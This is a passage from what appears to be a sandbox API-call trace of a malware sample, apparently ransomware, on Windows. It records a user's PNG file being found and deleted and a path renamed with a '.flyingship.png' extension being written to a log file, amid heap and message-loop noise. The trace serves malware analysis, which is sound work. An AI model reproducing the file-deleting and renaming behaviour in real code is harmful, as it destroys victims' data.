0x4 [0189.760] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0189.760] FreeLibrary (hLibModule=0x75990000) returned 1 [0189.760] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.760] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.760] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.760] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png", lpFilePart=0x0) returned 0x52 [0189.760] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbef78b20, ftCreationTime.dwHighDateTime=0x1d5e1b2, ftLastAccessTime.dwLowDateTime=0x13eacf50, ftLastAccessTime.dwHighDateTime=0x1d5e31d, ftLastWriteTime.dwLowDateTime=0x1654a980, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xb4e0, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="Pw6nPSJwo.png", cAlternateFileName="PW6NPS~1.PNG")) returned 0x90ae18 [0189.760] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\pw6npsjwo.png")) returned 1 [0189.763] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbef78b20, ftCreationTime.dwHighDateTime=0x1d5e1b2, ftLastAccessTime.dwLowDateTime=0x13eacf50, ftLastAccessTime.dwHighDateTime=0x1d5e31d, ftLastWriteTime.dwLowDateTime=0x1654a980, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xb4e0, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="Pw6nPSJwo.png", cAlternateFileName="PW6NPS~1.PNG")) returned 0 [0189.763] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0189.766] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.766] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0189.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0189.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0189.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0189.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0189.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0189.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0189.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0189.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0189.767] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0189.767] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0189.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0189.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0189.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0189.767] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.767] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.767] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.767] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0189.767] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0189.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0189.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0189.768] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0189.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0189.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0189.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0189.768] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0189.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0189.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0189.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0189.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0189.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0189.768] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0189.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0189.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0189.768] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0189.768] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.768] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0189.769] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.769] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0189.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0189.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0189.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0189.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0189.769] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0189.769] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x2d8a, lpOverlapped=0x0) returned 1 [0189.769] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0189.769] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x2d8a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.769] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0189.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0189.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0189.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0189.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0189.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.flyingship.png\r\n", cchWideChar=96, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 96 [0189.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0189.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.flyingship.png\r\n", cchWideChar=96, lpMultiByteStr=0x9a5d10, cbMultiByte=96, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.flyingship.png\r\n", lpUsedDefaultChar=0x0) returned 96 [0189.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0189.770] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5de0 [0189.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0189.770] WriteFile (in: hFile=0x160, lpBuffer=0x9a5de0*, nNumberOfBytesToWrite=0x5f, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5de0*, lpNumberOfBytesWritten=0x87f43c*=0x5f, lpOverlapped=0x0) returned 1 [0189.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5de0 | out: hHeap=0x8a0000) returned 1 [0189.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0189.770] CloseHandle (hObject=0x160) returned 1 [0189.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0189.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0189.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0189.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0189.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0189.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0189.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0189.771] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0189.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0189.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0189.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0189.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0189.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0189.772] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0189.772] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0189.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0189.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0189.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0189.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0189.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6e48 | out: hHeap=0x8a0000) returned 1 [0189.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0189.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0189.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0189.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0189.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0189.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0189.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0189.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0189.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0189.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0189.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0189.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0189.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0189.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0189.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0189.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0189.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0189.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0189.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0189.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0189.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0189.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0189.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0189.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0189.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0189.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0189.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0189.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0189.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0189.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0189.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0189.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0189.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0189.773] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0189.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0189.773] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0189.773] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0189.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0189.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0189.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0189.774] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0189.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0189.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0189.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0189.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b10 [0189.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0189.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0189.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0189.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0189.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0189.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0189.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0189.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd810 [0189.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0189.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0189.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0189.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0189.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0189.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0189.775] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0189.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0189.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0189.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0189.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0189.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0189.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0189.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0189.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0189.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0189.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0189.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0189.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0189.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0189.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0189.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0189.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0189.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0189.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0189.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0189.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0189.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0189.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0189.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0189.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0189.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0189.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0189.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0189.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0189.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0189.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0189.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0189.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0189.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0189.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0189.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0189.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0189.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0189.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0189.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0189.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0189.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0189.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0189.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0189.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0189.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: 